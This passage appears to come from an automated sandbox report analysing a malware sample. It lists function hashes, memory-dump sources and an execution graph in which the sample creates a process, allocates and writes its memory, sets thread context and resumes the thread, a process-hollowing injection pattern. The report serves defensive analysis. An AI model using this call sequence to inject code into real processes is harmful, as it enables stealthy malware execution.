                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f926248ee721cee0c2f06b20cba55d56deed138b43006337e7bbd7afc645bd63
                          • Instruction ID: 2b9b26414ee2acf47252a4729339d999fc38c8e796217475d03f85d9fd65ea69
                          • Opcode Fuzzy Hash: f926248ee721cee0c2f06b20cba55d56deed138b43006337e7bbd7afc645bd63
                          • Instruction Fuzzy Hash: 13016970F101144BDB64EA68E454B6EB3EAEB89710F10A83EE50AC7391EA76DC428380
                          Function 06BBC830 Relevance: .0, Instructions: 41COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e8849a89ce69aae6873fdf56867be421ac7749de6d547801d367d5a99d5036de
                          • Instruction ID: a26b2989ac602f25e5a96d30094cdfd462d9eb53bc58ea7eecf2550513daf65b
                          • Opcode Fuzzy Hash: e8849a89ce69aae6873fdf56867be421ac7749de6d547801d367d5a99d5036de
                          • Instruction Fuzzy Hash: A8F02432F212649FDB94C965EC009EABB39E745350F102439E901EB384D762AC01CBC0
                          Function 06BBC840 Relevance: .0, Instructions: 33COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 963f2aeeb69b5719a3bb26ecf1ab330c826454660f8aa236d2248a8be8d18b9d
                          • Instruction ID: 790c265c8749acad8ed37fe4493747677f3388fa50b5c729411e95dc14cc61f9
                          • Opcode Fuzzy Hash: 963f2aeeb69b5719a3bb26ecf1ab330c826454660f8aa236d2248a8be8d18b9d
                          • Instruction Fuzzy Hash: ADF0A772E202689BDB54D565DC049EABB39F784354F005469E901F7254D7756C00CBC0
                          Function 06BB64D9 Relevance: .0, Instructions: 28COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4162479d214560f66573151fe5ebb4ebd7f7d13ace1d582958bf1b2b0f300f1c
                          • Instruction ID: 66c4dd4baa76e75a6a130a203d294ef45af892c7573aec6e3e01fbd700f010a8
                          • Opcode Fuzzy Hash: 4162479d214560f66573151fe5ebb4ebd7f7d13ace1d582958bf1b2b0f300f1c
                          • Instruction Fuzzy Hash: C0E0D8F2E1624CAFDF50CA708A457EA7BBDD742204F1458E5D408CB242F1F6DE518791

                          Execution Graph

                          Execution Coverage:10.1%
                          Dynamic/Decrypted Code Coverage:100%
                          Signature Coverage:0%
                          Total number of Nodes:248
                          Total number of Limit Nodes:12
                          execution_graph 60889 13cd01c 60890 13cd034 60889->60890 60891 13cd08e 60890->60891 60894 51e117c 60890->60894 60903 51e2c08 60890->60903 60897 51e1187 60894->60897 60895 51e2c79 60925 51e12a4 60895->60925 60897->60895 60898 51e2c69 60897->60898 60912 51e2e6c 60898->60912 60917 51e2da0 60898->60917 60921 51e2d90 60898->60921 60899 51e2c77 60906 51e2c45 60903->60906 60904 51e2c79 60905 51e12a4 CallWindowProcW 60904->60905 60908 51e2c77 60905->60908 60906->60904 60907 51e2c69 60906->60907 60909 51e2e6c CallWindowProcW 60907->60909 60910 51e2d90 CallWindowProcW 60907->60910 60911 51e2da0 CallWindowProcW 60907->60911 60909->60908 60910->60908 60911->60908 60913 51e2e2a 60912->60913 60914 51e2e7a 60912->60914 60929 51e2e58 60913->60929 60915 51e2e40 60915->60899 60918 51e2db4 60917->60918 60920 51e2e58 CallWindowProcW 60918->60920 60919 51e2e40 60919->60899 60920->60919 60923 51e2db4 60921->60923 60922 51e2e40 60922->60899 60924 51e2e58 CallWindowProcW 60923->60924 60924->60922 60926 51e12af 60925->60926 60927 51e435a CallWindowProcW 60926->60927 60928 51e4309 60926->60928 60927->60928 60928->60899 60930 51e2e69 60929->60930 60932 51e4292 60929->60932 60930->60915 60933 51e12a4 CallWindowProcW 60932->60933 60934 51e42aa 60933->60934 60934->60930 60693 5398ba8 60695 5398bbc 60693->60695 60694 5398bf8 60695->60694 60706 4ca1bd4 60695->60706 60714 4ca1d36 60695->60714 60718 4ca1b90 60695->60718 60723 4ca1c82 60695->60723 60728 4ca1c2c 60695->60728 60735 4ca143e 60695->60735 60742 4ca1488 60695->60742 60747 4ca1f2a 60695->60747 60751 4ca091a 60695->60751 60755 4ca1a05 60695->60755 60707 4ca1bd7 60706->60707 60708 4ca1c3f 60707->60708 60711 4ca2740 VirtualProtect 60707->60711 60759 4ca2739 60707->60759 60709 4ca1c85 60708->60709 60712 4ca2739 VirtualProtect 60708->60712 60762 4ca2740 60708->60762 60711->60708 60712->60708 60716 4ca2739 VirtualProtect 60714->60716 60717 4ca2740 VirtualProtect 60714->60717 60715 4ca1d4a 60716->60715 60717->60715 60719 4ca1b94 60718->60719 60721 4ca2739 VirtualProtect 60719->60721 60722 4ca2740 VirtualProtect 60719->60722 60720 4ca1c15 60721->60720 60722->60720 60724 4ca1c3f 60723->60724 60725 4ca1c85 60723->60725 60724->60723 60726 4ca2739 VirtualProtect 60724->60726 60727 4ca2740 VirtualProtect 60724->60727 60726->60724 60727->60724 60729 4ca1c3f 60728->60729 60731 4ca2739 VirtualProtect 60728->60731 60732 4ca2740 VirtualProtect 60728->60732 60730 4ca1c85 60729->60730 60733 4ca2739 VirtualProtect 60729->60733 60734 4ca2740 VirtualProtect 60729->60734 60731->60729 60732->60729 60733->60729 60734->60729 60737 4ca1453 60735->60737 60738 4ca2739 VirtualProtect 60735->60738 60739 4ca2740 VirtualProtect 60735->60739 60736 4ca148c 60737->60736 60740 4ca2739 VirtualProtect 60737->60740 60741 4ca2740 VirtualProtect 60737->60741 60738->60737 60739->60737 60740->60737 60741->60737 60743 4ca148c 60742->60743 60744 4ca1453 60742->60744 60744->60742 60745 4ca2739 VirtualProtect 60744->60745 60746 4ca2740 VirtualProtect 60744->60746 60745->60744 60746->60744 60749 4ca2739 VirtualProtect 60747->60749 60750 4ca2740 VirtualProtect 60747->60750 60748 4ca1f3b 60749->60748 60750->60748 60753 4ca2739 VirtualProtect 60751->60753 60754 4ca2740 VirtualProtect 60751->60754 60752 4ca092b 60753->60752 60754->60752 60757 4ca2739 VirtualProtect 60755->60757 60758 4ca2740 VirtualProtect 60755->60758 60756 4ca1a19 60757->60756 60758->60756 60760 4ca2788 VirtualProtect 60759->60760 60761 4ca27c2 60760->60761 60761->60708 60763 4ca2788 VirtualProtect 60762->60763 60764 4ca27c2 60763->60764 60764->60708 60679 2a3d420 60680 2a3d466 60679->60680 60684 2a3d5f1 60680->60684 60687 2a3d600 60680->60687 60681 2a3d553 60686 2a3d62e 60684->60686 60690 2a3cfb0 60684->60690 60686->60681 60688 2a3cfb0 DuplicateHandle 60687->60688 60689 2a3d62e 60688->60689 60689->60681 60691 2a3d668 DuplicateHandle 60690->60691 60692 2a3d6fe 60691->60692 60692->60686 60935 2a34a10 60936 2a34a19 60935->60936 60937 2a34a1f 60936->60937 60939 2a34b09 60936->60939 60940 2a34b2d 60939->60940 60944 2a34c09 60940->60944 60948 2a34c18 60940->60948 60946 2a34c3f 60944->60946 60945 2a34d1c 60945->60945 60946->60945 60952 2a347f4 60946->60952 60950 2a34c3f 60948->60950 60949 2a34d1c 60949->60949 60950->60949 60951 2a347f4 CreateActCtxA 60950->60951 60951->60949 60953 2a35ca8 CreateActCtxA 60952->60953 60955 2a35d6b 60953->60955 60956 2a3b090 60960 2a3b188 60956->60960 60968 2a3b178 60956->60968 60957 2a3b09f 60961 2a3b199 60960->60961 60962 2a3b1bc 60960->60962 60961->60962 60976 2a3b411 60961->60976 60980 2a3b420 60961->60980 60962->60957 60963 2a3b1b4 60963->60962 60964 2a3b3c0 GetModuleHandleW 60963->60964 60965 2a3b3ed 60964->60965 60965->60957 60969 2a3b199 60968->60969 60971 2a3b1bc 60968->60971 60969->60971 60974 2a3b411 LoadLibraryExW 60969->60974 60975 2a3b420 LoadLibraryExW 60969->60975 60970 2a3b1b4 60970->60971 60972 2a3b3c0 GetModuleHandleW 60970->60972 60971->60957 60973 2a3b3ed 60972->60973 60973->60957 60974->60970 60975->60970 60977 2a3b434 60976->60977 60979 2a3b459 60977->60979 60984 2a3ab90 60977->60984 60979->60963 60981 2a3b434 60980->60981 60982 2a3b459 60981->60982 60983 2a3ab90 LoadLibraryExW 60981->60983 60982->60963 60983->60982 60985 2a3b600 LoadLibraryExW 60984->60985 60987 2a3b679 60985->60987 60987->60979 60988 52dfc68 60989 52dfcb6 DrawTextExW 60988->60989 60991 52dfd0e 60989->60991 60992 4cb61b0 60993 4cb633b 60992->60993 60995 4cb61d6 60992->60995 60995->60993 60996 4cb45f8 60995->60996 60997 4cb6430 PostMessageW 60996->60997 60998 4cb649c 60997->60998 60998->60995 60765 4cb4ed6 60766 4cb4e64 60765->60766 60767 4cb4ed9 60765->60767 60781 4cb4e92 60766->60781 60782 4cb57ca 60766->60782 60787 4cb55f0 60766->60787 60792 4cb55de 60766->60792 60797 4cb54df 60766->60797 60802 4cb5a3b 60766->60802 60806 4cb5824 60766->60806 60811 4cb53c6 60766->60811 60816 4cb54a1 60766->60816 60821 4cb5541 60766->60821 60826 4cb5302 60766->60826 60831 4cb5603 60766->60831 60835 4cb562c 60766->60835 60840 4cb55a9 60766->60840 60783 4cb57cb 60782->60783 60845 4cb2498 60783->60845 60849 4cb24a0 60783->60849 60784 4cb5422 60784->60781 60788 4cb55fd 60787->60788 60790 4cb2498 ResumeThread 60788->60790 60791 4cb24a0 ResumeThread 60788->60791 60789 4cb5422 60789->60781 60790->60789 60791->60789 60793 4cb58c4 60792->60793 60853 4cb2548 60793->60853 60857 4cb2550 60793->60857 60794 4cb5625 60794->60781 60798 4cb54e5 60797->60798 60861 4cb2c08 60798->60861 60865 4cb2c10 60798->60865 60799 4cb5451 60799->60781 60869 4cb2b18 60802->60869 60873 4cb2b20 60802->60873 60803 4cb5a5f 60807 4cb59d7 60806->60807 60809 4cb2548 Wow64SetThreadContext 60807->60809 60810 4cb2550 Wow64SetThreadContext 60807->60810 60808 4cb59f2 60808->60781 60809->60808 60810->60808 60812 4cb53cc 60811->60812 60877 4cb2da8 60812->60877 60881 4cb2d9e 60812->60881 60817 4cb5b97 60816->60817 60819 4cb2b18 WriteProcessMemory 60817->60819 60820 4cb2b20 WriteProcessMemory 60817->60820 60818 4cb5c12 60819->60818 60820->60818 60822 4cb5500 60821->60822 60823 4cb5422 60821->60823 60824 4cb2c08 ReadProcessMemory 60822->60824 60825 4cb2c10 ReadProcessMemory 60822->60825 60823->60781 60824->60823 60825->60823 60827 4cb5329 60826->60827 60828 4cb53fa 60827->60828 60829 4cb2da8 CreateProcessA 60827->60829 60830 4cb2d9e CreateProcessA 60827->60830 60828->60781 60829->60828 60830->60828 60832 4cb5834 60831->60832 60885 4cb2a60 60832->60885 60836 4cb55b7 60835->60836 60838 4cb2b18 WriteProcessMemory 60836->60838 60839 4cb2b20 WriteProcessMemory 60836->60839 60837 4cb5936 60838->60837 60839->60837 60841 4cb55b6 60840->60841 60843 4cb2b18 WriteProcessMemory 60841->60843 60844 4cb2b20 WriteProcessMemory 60841->60844 60842 4cb5936 60843->60842 60844->60842 60846 4cb249e ResumeThread 60845->60846 60848 4cb2511 60846->60848 60848->60784 60850 4cb24e0 ResumeThread 60849->60850 60852 4cb2511 60850->60852 60852->60784 60854 4cb2595 Wow64SetThreadContext 60853->60854 60856 4cb25dd 60854->60856 60856->60794 60858 4cb2595 Wow64SetThreadContext 60857->60858 60860 4cb25dd 60858->60860 60860->60794 60862 4cb2c5b ReadProcessMemory 60861->60862 60864 4cb2c9f 60862->60864 60864->60799 60866 4cb2c5b ReadProcessMemory 60865->60866 60868 4cb2c9f 60866->60868 60868->60799 60870 4cb2b68 WriteProcessMemory 60869->60870 60872 4cb2bbf 60870->60872 60872->60803 60874 4cb2b68 WriteProcessMemory 60873->60874 60876 4cb2bbf 60874->60876 60876->60803 60878 4cb2e31 60877->60878 60878->60878 60879 4cb2f96 CreateProcessA 60878->60879 60880 4cb2ff3 60879->60880 60882 4cb2e31 60881->60882 60882->60882 60883 4cb2f96 CreateProcessA 60882->60883 60884 4cb2ff3 60883->60884 60886 4cb2aa0 VirtualAllocEx 60885->60886 60888 4cb2add 60886->60888

                          Executed Functions

                          Function 0539B7AD Relevance: 4.1, Strings: 3, Instructions: 333COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 133 539b7ad-539b7d0 134 539b7d1-539b824 133->134 134->134 135 539b826-539b865 134->135 136 539b86c-539b889 135->136 137 539b867 135->137 138 539b891 136->138 137->136 139 539b898-539b8b4 138->139 140 539b8bd-539b8be 139->140 141 539b8b6 139->141 153 539bc36-539bc3d 140->153 160 539b8c3-539b8d8 140->160 141->138 142 539ba99-539baa5 141->142 143 539bb1b-539bb24 141->143 144 539bc1a-539bc31 141->144 145 539b8da-539b8e6 141->145 146 539bb9c-539bba8 141->146 147 539b99f-539b9b1 141->147 148 539b9fe-539ba12 141->148 149 539bb50-539bb54 141->149 150 539b975-539b99a 141->150 151 539ba17-539ba23 141->151 152 539baf6-539bb16 141->152 141->153 154 539b9b6-539b9c3 141->154 155 539bbc9-539bbd5 141->155 156 539b9c8-539b9e1 call 539be38 141->156 157 539ba68-539ba94 141->157 158 539b92b-539b940 141->158 159 539bb80-539bb97 141->159 141->160 161 539b945-539b949 141->161 162 539bac6-539baca 141->162 163 539baac-539bac1 142->163 164 539baa7 142->164 169 539bb37-539bb3e 143->169 170 539bb26-539bb35 143->170 144->139 177 539b8e8 145->177 178 539b8ed-539b903 145->178 175 539bbaa 146->175 176 539bbaf-539bbc4 146->176 147->139 148->139 171 539bb67-539bb6e 149->171 172 539bb56-539bb65 149->172 150->139 173 539ba2a-539ba40 151->173 174 539ba25 151->174 152->139 154->139 179 539bbdc-539bbf2 155->179 180 539bbd7 155->180 186 539b9e7-539b9f9 156->186 157->139 158->139 159->139 160->139 165 539b94b-539b95a 161->165 166 539b95c-539b963 161->166 167 539badd-539bae4 162->167 168 539bacc-539badb 162->168 163->139 164->163 182 539b96a-539b970 165->182 166->182 181 539baeb-539baf1 167->181 168->181 185 539bb45-539bb4b 169->185 170->185 187 539bb75-539bb7b 171->187 172->187 194 539ba42 173->194 195 539ba47-539ba63 173->195 174->173 175->176 176->139 177->178 196 539b90a-539b926 178->196 197 539b905 178->197 198 539bbf9-539bc15 179->198 199 539bbf4 179->199 180->179 181->139 182->139 185->139 186->139 187->139 194->195 195->139 196->139 197->196 198->139 199->198
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID: />X$/>X$P,0e
                          • API String ID: 0-1511438267
                          • Opcode ID: 89e86715d8b535599f3d5d0978ca00e6cd7347ddbac1aaa3ef6161f92a98fadf
                          • Instruction ID: 29d1912a9195bb960cbb3cc8191a3ac0667da9e67f66751bc8a845e0c4a7a28c
                          • Opcode Fuzzy Hash: 89e86715d8b535599f3d5d0978ca00e6cd7347ddbac1aaa3ef6161f92a98fadf
                          • Instruction Fuzzy Hash: 63E1BEB4D1820ADFDB08CFA5E4958AEFBB6FF88341B148529D415AB354DB349A42CF80
                          Function 0539B840 Relevance: 4.0, Strings: 3, Instructions: 284COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 205 539b840-539b865 206 539b86c-539b889 205->206 207 539b867 205->207 208 539b891 206->208 207->206 209 539b898-539b8b4 208->209 210 539b8bd-539b8be 209->210 211 539b8b6 209->211 223 539bc36-539bc3d 210->223 230 539b8c3-539b8d8 210->230 211->208 212 539ba99-539baa5 211->212 213 539bb1b-539bb24 211->213 214 539bc1a-539bc31 211->214 215 539b8da-539b8e6 211->215 216 539bb9c-539bba8 211->216 217 539b99f-539b9b1 211->217 218 539b9fe-539ba12 211->218 219 539bb50-539bb54 211->219 220 539b975-539b99a 211->220 221 539ba17-539ba23 211->221 222 539baf6-539bb16 211->222 211->223 224 539b9b6-539b9c3 211->224 225 539bbc9-539bbd5 211->225 226 539b9c8-539b9e1 call 539be38 211->226 227 539ba68-539ba94 211->227 228 539b92b-539b940 211->228 229 539bb80-539bb97 211->229 211->230 231 539b945-539b949 211->231 232 539bac6-539baca 211->232 233 539baac-539bac1 212->233 234 539baa7 212->234 239 539bb37-539bb3e 213->239 240 539bb26-539bb35 213->240 214->209 247 539b8e8 215->247 248 539b8ed-539b903 215->248 245 539bbaa 216->245 246 539bbaf-539bbc4 216->246 217->209 218->209 241 539bb67-539bb6e 219->241 242 539bb56-539bb65 219->242 220->209 243 539ba2a-539ba40 221->243 244 539ba25 221->244 222->209 224->209 249 539bbdc-539bbf2 225->249 250 539bbd7 225->250 256 539b9e7-539b9f9 226->256 227->209 228->209 229->209 230->209 235 539b94b-539b95a 231->235 236 539b95c-539b963 231->236 237 539badd-539bae4 232->237 238 539bacc-539badb 232->238 233->209 234->233 252 539b96a-539b970 235->252 236->252 251 539baeb-539baf1 237->251 238->251 255 539bb45-539bb4b 239->255 240->255 257 539bb75-539bb7b 241->257 242->257 264 539ba42 243->264 265 539ba47-539ba63 243->265 244->243 245->246 246->209 247->248 266 539b90a-539b926 248->266 267 539b905 248->267 268 539bbf9-539bc15 249->268 269 539bbf4 249->269 250->249 251->209 252->209 255->209 256->209 257->209 264->265 265->209 266->209 267->266 268->209 269->268
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID: />X$/>X$P,0e
                          • API String ID: 0-1511438267
                          • Opcode ID: c4251a8d350ce53b38f4737a68e280cfad379fd1e00f68fd9f475efd7888ff42
                          • Instruction ID: 5b55c8fc69c3463347a7d71ab44cf0ff01cc5e25b2231dc936d34d67f81ca8d2
                          • Opcode Fuzzy Hash: c4251a8d350ce53b38f4737a68e280cfad379fd1e00f68fd9f475efd7888ff42
                          • Instruction Fuzzy Hash: 6CC15BB0D1820ADFDF08CF95E4958AEFBB6FF88340B10C559D416AB258DB349A42CF94
                          Function 0539DEA0 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID: p
                          • API String ID: 0-2181537457
                          • Opcode ID: e237ad6cf8163a108008f663f5a3fcd01b721266e53560d2e276560c84279cc6
                          • Instruction ID: dce40cd23aa6c308984ecc7094aa6576c960765ff5754f7d6bdcf95d81b557ff
                          • Opcode Fuzzy Hash: e237ad6cf8163a108008f663f5a3fcd01b721266e53560d2e276560c84279cc6
                          • Instruction Fuzzy Hash: C45109B0E01318CFEB58CF6AD940B8AFBB7BF89201F04C5A9D408AB215D7309A85CF55
                          Function 05392558 Relevance: .4, Instructions: 382COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 494efd90f859b179d8c35cea0866a7610bb2279b844f8fae9c48b52e818d559f
                          • Instruction ID: c56b50dcf217cf471c337a26f7b36e28ed55aa72386fd72131d329fd0c43d9da
                          • Opcode Fuzzy Hash: 494efd90f859b179d8c35cea0866a7610bb2279b844f8fae9c48b52e818d559f
                          • Instruction Fuzzy Hash: DB12D775D1061A8FCB15DF68C884AE9F7B1BF49300F1586AAD859A7211EB70AAC4CF90
                          Function 05392548 Relevance: .4, Instructions: 377COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c3915d89c81f29c53b50341d3e2fd1cd84b2bfa451aa7f6eb1834c6f044581a7
                          • Instruction ID: c70e7305705f073a9a686963da7e94009242c65562cee51061653b4c9e76d127
                          • Opcode Fuzzy Hash: c3915d89c81f29c53b50341d3e2fd1cd84b2bfa451aa7f6eb1834c6f044581a7
                          • Instruction Fuzzy Hash: E012C875D1071ACFCB15DF68C884AE9F7B1BF49300F1586AAD859A7211EB70AAC4CF90
                          Function 053996B0 Relevance: .2, Instructions: 219COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bd61f6db59a03f51a4453da9cfb937bc9e6f78a0b290b42699a6e37df3cddfed
                          • Instruction ID: 3ea1ff91d0b23f0600519c387232d16dfab85ef930b3947fbbc9f7f391da12f7
                          • Opcode Fuzzy Hash: bd61f6db59a03f51a4453da9cfb937bc9e6f78a0b290b42699a6e37df3cddfed
                          • Instruction Fuzzy Hash: 6691F3B5E14209CFDB08CFA9C885A9EFBF6FF89300F14802AE419AB254DB759945CF54
                          Function 05399721 Relevance: .2, Instructions: 216COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 41d1ed1a0c3614807705ed290369f5b3a13a84decb224d96433e4131d7a342ca
                          • Instruction ID: 35f7e0209d9dbb7e1bd6687910c850ebd9dd8c5ad2d0f13dc25cba1be05a7244
                          • Opcode Fuzzy Hash: 41d1ed1a0c3614807705ed290369f5b3a13a84decb224d96433e4131d7a342ca
                          • Instruction Fuzzy Hash: 3E9113B5E14219CFDB08CFA9C885A9EFBF6FF89300F14802AE419AB254DB319945CF54
                          Function 053997B0 Relevance: .2, Instructions: 183COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 721516910730d7175be39e233b4cb3c24a2e90b62361f588052b0a86f647c849
                          • Instruction ID: d294003262ae480b30af6533d5b7451dcfed9367a1e132da220b71949d948e09
                          • Opcode Fuzzy Hash: 721516910730d7175be39e233b4cb3c24a2e90b62361f588052b0a86f647c849
                          • Instruction Fuzzy Hash: 2881A2B5E042198FDB08CFEAC985A9EFBB6FF89300F10842AD819BB254DB345905CF54
                          Function 05399FD8 Relevance: .1, Instructions: 138COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 928e84fcebff81dff16ecc241c1401895aa61a8226b688db236a34b56c93ce1d
                          • Instruction ID: 33e30a05dff826b4e1fd2300d4cae16526e6247b132a44dcf6bc3949c2adeed2
                          • Opcode Fuzzy Hash: 928e84fcebff81dff16ecc241c1401895aa61a8226b688db236a34b56c93ce1d
                          • Instruction Fuzzy Hash: 465116B0E142199FDB08CFAAD9456EEFBF2BF89300F14C56AD419B7350D7345A418B68
                          Function 0539A939 Relevance: .1, Instructions: 71COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 639681846594bd84ea986e9868c20c753c20ad91c899cd43f4c20a9c51ccb987
                          • Instruction ID: bdc331e5cd5b07a8b8086a81610f22675ad234f2a242caa971962085bedc43fa
                          • Opcode Fuzzy Hash: 639681846594bd84ea986e9868c20c753c20ad91c899cd43f4c20a9c51ccb987
                          • Instruction Fuzzy Hash: C32126B1E046188BEB19CFAAD9443DEFBF3AFC8300F14C16AD409AA254DB740A45CF90
                          Function 0539BE38 Relevance: 2.6, Strings: 2, Instructions: 79COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 506 539be38-539be66 507 539be68 506->507 508 539be6d-539be72 506->508 507->508 521 539be75 call 539bf51 508->521 522 539be75 call 539bf60 508->522 509 539be7b 510 539be82-539be9e 509->510 511 539bea0 510->511 512 539bea7-539bea8 510->512 511->509 511->512 513 539bf2f-539bf33 511->513 514 539bead-539bec1 511->514 515 539bef1-539bf0b 511->515 516 539bf10-539bf2a 511->516 512->513 518 539bec3-539bed2 514->518 519 539bed4-539bedb 514->519 515->510 516->510 520 539bee2-539beef 518->520 519->520 520->510 521->509 522->509
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID: 8[W$8[W
                          • API String ID: 0-3882825709
                          • Opcode ID: b5b53bf3e0469740f0688953805ddc22a0aef55b259af840eea11a33b7f8cdda
                          • Instruction ID: dd6e934693c3b345bd5788813a297337c431f7a3797eacc831383d01205ee8ed
                          • Opcode Fuzzy Hash: b5b53bf3e0469740f0688953805ddc22a0aef55b259af840eea11a33b7f8cdda
                          • Instruction Fuzzy Hash: 82313CB0D09209EFCB08CFA5E5505AEFFF6BF89200F14D5AAD505A7211D7308B41CB91
                          Function 053966EC Relevance: 1.8, Strings: 1, Instructions: 578COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID: un
                          • API String ID: 0-3067141278
                          • Opcode ID: 727aa174f96d51b0ffe71564ea02e37ecaaae189af3433d027f856993f19cc49
                          • Instruction ID: d2c8dd7f4d6366ddbb05bac563733b2db590be1d702d4fe74a10580e80627a6c
                          • Opcode Fuzzy Hash: 727aa174f96d51b0ffe71564ea02e37ecaaae189af3433d027f856993f19cc49
                          • Instruction Fuzzy Hash: 0C227CB4F05258CFEF18DBA5D556BADBBB7BF84300F14806AE416AB285CBB09C41CB51
                          Function 04CB2D9E Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
